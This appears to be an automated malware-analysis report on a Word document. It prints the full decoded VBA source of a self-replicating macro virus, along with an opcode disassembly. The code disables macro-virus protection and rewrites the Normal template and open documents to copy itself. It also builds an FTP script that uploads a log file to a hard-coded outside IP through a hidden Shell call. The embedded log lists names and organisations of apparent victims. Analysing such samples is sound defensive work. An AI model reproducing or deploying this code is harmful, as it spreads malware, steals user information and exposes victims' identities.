MALICIOUS
260
Risk Score
Heuristics 4
-
ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-31
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25020 bytes |
SHA-256: 449aaa52cf8662d56a7e01f812fd9c29c6d687b5421a5022224f4503f0038714 |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub ComboBox1_Change()
End Sub
Private Sub CommandButton1_Clic()
End Sub
Private Sub CommandButton1_Click()
End Sub
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
For i = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
LogFile = "C:\hsf" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For i = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next i
OurCode = OurCode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDocument = ActiveDocument.Saved
OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString OurCode
If SaveDocument = True Then ActiveDocument.Save
End If
End If
End Sub
' Logfile -->
' 09:08:36 - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'
' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'
' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'
' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'
' 10:42:25 AM - Wednesday, 23 Dec 1998
' BCBSA
'
' 02:25:08 PM - Wednesday, 23 Dec 1998
' BCBSA
'
' 01:28:09 PM - Tuesday, 5 Jan 1999
' BCBSA
'
' 06:56:46 PM - Monday, 11 Jan 1999
' Kay Helgerson
'
' 06:01:43 PM - Tuesday, 26 Jan 1999
' Ayenda M. Lambert
'
' 09:06:30 AM - Monday, 1 Feb 1999
' Dee Carr
'
' 08:39:53 - Donnerstag, 4 Feb 1999
' froem.
'
' 01:32:12 - Mittwoch, 10 Feb 1999
' sandra.
'
' 02:10:28 - Tuesday, 16 Feb 1999
' Avril
'
' 08:30:15 - Tuesday, 23 Feb 1999
' spike
'
' 12:38:43 PM - Monday, 1 Mar 1999
' sarahp
'
' 10:34:46 AM - Sunday, 7 Mar 1999
' George Thomaz
'
' 08:05:42 AM - Monday, 29 Mar 1999
' Atlas Telecom
'
' 02:13:34 PM - Sunday, 6 Jun 1999
' Deepak Parekh
'
' 11:18:07 AM - Sunday, 13 Jun 1999
' ATLAS
'
' 11:34:00 AM - Wednesday, 16 Jun 1999
' .
'
' 12:25:42 AM - Wednesday, 28 Jul 1999
' ACER
'
' 05:24:09 - Monday, 11 Oct 1999
' SKYLAKE RENTALS
'
' 01:44:33 PM - Wednesday, 13 Oct 1999
' Balfour Kilpatrick
'
' 03:46:27 - Wednesday, 27 Oct 1999
' IT Administrator
'
' 01:43:45 PM - Monday, 15 Nov 1999
' Martin Macnish
'
' 01:27:40 - Thursday, 18 Nov 1999
' Richard Marchant
'
' 09:18:34 - Monday, 22 Nov 1999
' Sarah Foster
'
' 09:59:02 - Thursday, 25 Nov 1999
' Gateway 2000 Licensed User
'
' 02:35:32 - Thursday, 2 Dec 1999
' Capita
'
' 01:00:33 AM - Tuesday, 7 Dec 1999
' Graeme Lucas
'
' 02:49:39 - Tuesday, 14 Dec 1999
' Surridge Dawson
'
' 09:35:32 - Friday, 31 Dec 1999
' Surridge Dawson
' S.G.O.Thomas
' 03:47:52 - Friday, 14 Jan 2000
' Surridge Dawson
'
' 10:28:16 - Monday, 17 Jan 2000
' Surridge Dawson
'
' 06:20:37 - Wednesday, 19 Jan 2000
' Surridge Dawson
'
' 02:20:25 - Tuesday, 11 Apr 2000
' Surridge Dawson
'
' 05:18:13 - Monday, 17 Apr 2000
' Surridge Dawson
'
' 05:49:50 - Monday, 17 Apr 2000
' Surridge Dawson
'
' 09:29:25 - Wednesday, 26 Apr 2000
' Surridge Dawson
'
' 09:36:43 AM - Friday, 12 May 2000
' Surridge Dawson
'
' 04:12:19 PM - Friday, 12 May 2000
' Ditry PC
'
' Processing file: /opt/analyzer/scan_staging/777bd9f31ef044b3a0c20fb5957845c6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 14111 bytes
' Line #0:
' FuncDefn (Private Sub ComboBox1_Change())
' Line #1:
' Line #2:
' EndSub
' Line #3:
' Line #4:
' FuncDefn (Private Sub CommandButton1_Clic())
' Line #5:
' EndSub
' Line #6:
' Line #7:
' FuncDefn (Private Sub CommandButton1_Click())
' Line #8:
' Line #9:
' EndSub
' Line #10:
' Line #11:
' FuncDefn (Private Sub Document_Close())
' Line #12:
' Line #13:
' OnError (Resume Next)
' Line #14:
' Line #15:
' Dim (Const)
' LitStr 0x0014 "<- this is a marker!"
' VarDefn Marker
' Line #16:
' Line #17:
' QuoteRem 0x0000 0x0011 "Declare Variables"
' Line #18:
' Dim
' VarDefn SaveDocument
' VarDefn SaveNormalTemplate
' VarDefn DocumentInfected
' VarDefn NormalTemplateInfected (As Boolean)
' Line #19:
' Dim
' VarDefn ad
' VarDefn nt (As Object)
' Line #20:
' Dim
' VarDefn OurCode
' VarDefn UserAddress
' VarDefn LogData
' VarDefn LogFile (As String)
' Line #21:
' Line #22:
' QuoteRem 0x0000 0x0014 "Initialize Variables"
' Line #23:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set ad
' Line #24:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set nt
' Line #25:
' Line #26:
' Ld Marker
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x2710
' LitDI2 0x2710
' Ld ad
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St DocumentInfected
' Line #27:
' Ld Marker
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x2710
' LitDI2 0x2710
' Ld nt
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St NormalTemplateInfected
' Line #28:
' Line #29:
' Line #30:
' QuoteRem 0x0000 0x001E "Switch the VirusProtection OFF"
' Line #31:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #32:
' Line #33:
' Line #34:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x0001
' Eq
' Paren
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x0007 "LogFile"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitVarSpecial (False)
' Eq
' Paren
' And
' IfBlock
' Line #35:
' Line #36:
' Ld DocumentInfected
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #37:
' LitDI2 0x0001
' Ld ad
' MemLd CodeModule
' MemLd CountOfLines
' Ld ad
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St LogData
' Line #38:
' Ld NormalTemplateInfected
' LitVarSpecial (True)
' Eq
' ElseIfBlock
' Line #39:
' LitDI2 0x0001
' Ld nt
' MemLd CodeModule
' MemLd CountOfLines
' Ld nt
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St LogData
' Line #40:
' EndIfBlock
' Line #41:
' Line #42:
' Ld LogData
' LitDI2 0x0001
' Ld LogData
' LitStr 0x0005 "' Log"
' LitStr 0x0008 "file -->"
' Concat
' FnInStr3
' Ld LogData
' FnLen
' LitDI2 0x0001
' Ld LogData
' LitStr 0x0005 "' Log"
' LitStr 0x0008 "file -->"
' Concat
' FnInStr3
' Sub
' ArgsLd Mid$ 0x0003
' St LogData
' Line #43:
' Line #44:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' Line #45:
' Ld LogFile
' LitDI2 0x0008
' Ld Rnd
' Mul
' FnInt
' ArgsLd Str 0x0001
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Add
' St LogFile
' Line #46:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #47:
' LitStr 0x0006 "C:\hsf"
' Ld LogFile
' Concat
' LitStr 0x0004 ".sys"
' Concat
' St LogFile
' Line #48:
' Line #49:
' Ld LogFile
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #50:
' LitDI2 0x0001
' Sharp
' PrintChan
' Ld LogData
' PrintItemNL
' Line #51:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #52:
' Line #53:
' LitStr 0x000D "c:\netldx.vxd"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #54:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0010 "o 209.201.88.110"
' PrintItemNL
' Line #55:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000E "user anonymous"
' PrintItemNL
' Line #56:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "pass itsme@"
' PrintItemNL
' Line #57:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000B "cd incoming"
' PrintItemNL
' Line #58:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0005 "ascii"
' PrintItemNL
' Line #59:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "put "
' Ld LogFile
' Concat
' PrintItemNL
' Line #60:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "quit"
' PrintItemNL
' Line #61:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #62:
' Line #63:
' LitStr 0x002A "command.com /c ftp.exe -n -s:c:\netldx.vxd"
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #64:
' Line #65:
' LitVarSpecial (True)
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x0007 "LogFile"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #66:
' Line #67:
' EndIfBlock
' Line #68:
' Line #69:
' Line #70:
' QuoteRem 0x0000 0x004D "Make sure that some conditions are true before we continue infecting anything"
' Line #71:
' LineCont 0x0008 0B 00 03 00 12 00 03 00
' Ld DocumentInfected
' LitVarSpecial (True)
' Eq
' Ld NormalTemplateInfected
' LitVarSpecial (True)
' Eq
' Xor
' Paren
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatDocument
' Eq
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatTemplate
' Eq
' Or
' Paren
' And
' IfBlock
' Line #72:
' Line #73:
' Line #74:
' QuoteRem 0x0002 0x0019 "Infect the NormalTemplate"
' Line #75:
' Ld DocumentInfected
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #76:
' Line #77:
' Ld NormalTemplate
' MemLd Saved
' St SaveNormalTemplate
' Line #78:
' Line #79:
' LitDI2 0x0001
' Ld ad
' MemLd CodeModule
' MemLd CountOfLines
' Ld ad
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St OurCode
' Line #80:
' Line #81:
' Line #82:
' QuoteRem 0x0004 0x0031 "Write a log file of this NormalTemplate infection"
' Line #83:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld Application
' MemLd UserAddress
' FnLen
' For
' Line #84:
' Ld Application
' MemLd UserAddress
' Ld i
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Ne
' IfBlock
' Line #85:
' Ld Application
' MemLd UserAddress
' Ld i
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Ne
' IfBlock
' Line #86:
' Ld UserAddress
' Ld Application
' MemLd UserAddress
' Ld i
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Concat
' St UserAddress
' Line #87:
' EndIfBlock
' Line #88:
' ElseBlock
' Line #89:
' Ld UserAddress
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0002 "' "
' Concat
' St UserAddress
' Line #90:
' EndIfBlock
' Line #91:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #92:
' Line #93:
' LineCont 0x0010 09 00 0E 00 12 00 15 00 1E 00 0E 00 29 00 0E 00
' Ld OurCode
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0002 "' "
' Concat
' Ld Time
' LitStr 0x0010 "hh:mm:ss AMPM - "
' ArgsLd Format$ 0x0002
' Concat
' Ld Date
' LitStr 0x0010 "dddd, d mmm yyyy"
' ArgsLd Format$ 0x0002
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0002 "' "
' Concat
' Ld Application
' MemLd UserName
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0002 "' "
' Concat
' Ld UserAddress
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' St OurCode
' Line #94:
' Line #95:
' Line #96:
' LitDI2 0x0001
' Ld nt
' MemLd CodeModule
' MemLd CountOfLines
' Ld nt
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #97:
' Ld OurCode
' Ld nt
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #98:
' Line #99:
' Ld SaveNormalTemplate
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' EndIf
' Line #100:
' Line #101:
' EndIfBlock
' Line #102:
' Line #103:
' Line #104:
' QuoteRem 0x0002 0x0019 "Infect the ActiveDocument"
' Line #105:
' LineCont 0x0008 05 00 05 00 13 00 05 00
' Ld NormalTemplateInfected
' LitVarSpecial (True)
' Eq
' Ld ActiveDocument
' MemLd FullName
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' LitStr 0x0001 ":"
' Eq
' Ld ActiveDocument
' MemLd Saved
' LitVarSpecial (False)
' Eq
' Or
' Paren
' And
' IfBlock
' Line #106:
' Line #107:
' Ld ActiveDocument
' MemLd Saved
' St SaveDocument
' Line #108:
' Line #109:
' LitDI2 0x0001
' Ld nt
' MemLd CodeModule
' MemLd CountOfLines
' Ld nt
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St OurCode
' Line #110:
' Line #111:
' LitDI2 0x0001
' Ld ad
' MemLd CodeModule
' MemLd CountOfLines
' Ld ad
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #112:
' Ld OurCode
' Ld ad
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #113:
' Line #114:
' Ld SaveDocument
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #115:
' Line #116:
' EndIfBlock
' Line #117:
' Line #118:
' Line #119:
' EndIfBlock
' Line #120:
' Line #121:
' EndSub
' Line #122:
' Line #123:
' QuoteRem 0x0000 0x000C " Logfile -->"
' Line #124:
' Line #125:
' QuoteRem 0x0000 0x0022 " 09:08:36 - Saturday, 28 Nov 1998"
' Line #126:
' QuoteRem 0x0000 0x0007 " SPo0Ky"
' Line #127:
' QuoteRem 0x0000 0x000C " Blue Planet"
' Line #128:
' QuoteRem 0x0000 0x0000 ""
' Line #129:
' Line #130:
' Line #131:
' Line #132:
' QuoteRem 0x0000 0x0024 " 02:50:31 PM - Saturday, 28 Nov 1998"
' Line #133:
' QuoteRem 0x0000 0x000D " MARK B. SEAY"
' Line #134:
' QuoteRem 0x0000 0x0000 ""
' Line #135:
' Line #136:
' Line #137:
' Line #138:
' QuoteRem 0x0000 0x0021 " 08:04:45 AM - Friday, 4 Dec 1998"
' Line #139:
' QuoteRem 0x0000 0x0004 " UPS"
' Line #140:
' QuoteRem 0x0000 0x0000 ""
' Line #141:
' Line #142:
' Line #143:
' Line #144:
' QuoteRem 0x0000 0x0024 " 11:43:35 AM - Thursday, 17 Dec 1998"
' Line #145:
' QuoteRem 0x0000 0x0004 " WRO"
' Line #146:
' QuoteRem 0x0000 0x0000 ""
' Line #147:
' Line #148:
' Line #149:
' Line #150:
' QuoteRem 0x0000 0x0025 " 10:42:25 AM - Wednesday, 23 Dec 1998"
' Line #151:
' QuoteRem 0x0000 0x0006 " BCBSA"
' Line #152:
' QuoteRem 0x0000 0x0000 ""
' Line #153:
' Line #154:
' Line #155:
' Line #156:
' QuoteRem 0x0000 0x0025 " 02:25:08 PM - Wednesday, 23 Dec 1998"
' Line #157:
' QuoteRem 0x0000 0x0006 " BCBSA"
' Line #158:
' QuoteRem 0x0000 0x0000 ""
' Line #159:
' Line #160:
' Line #161:
' Line #162:
' QuoteRem 0x0000 0x0022 " 01:28:09 PM - Tuesday, 5 Jan 1999"
' Line #163:
' QuoteRem 0x0000 0x0006 " BCBSA"
' Line #164:
' QuoteRem 0x0000 0x0000 ""
' Line #165:
' Line #166:
' Line #167:
' Line #168:
' QuoteRem 0x0000 0x0022 " 06:56:46 PM - Monday, 11 Jan 1999"
' Line #169:
' QuoteRem 0x0000 0x000E " Kay Helgerson"
' Line #170:
' QuoteRem 0x0000 0x0000 ""
' Line #171:
' Line #172:
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.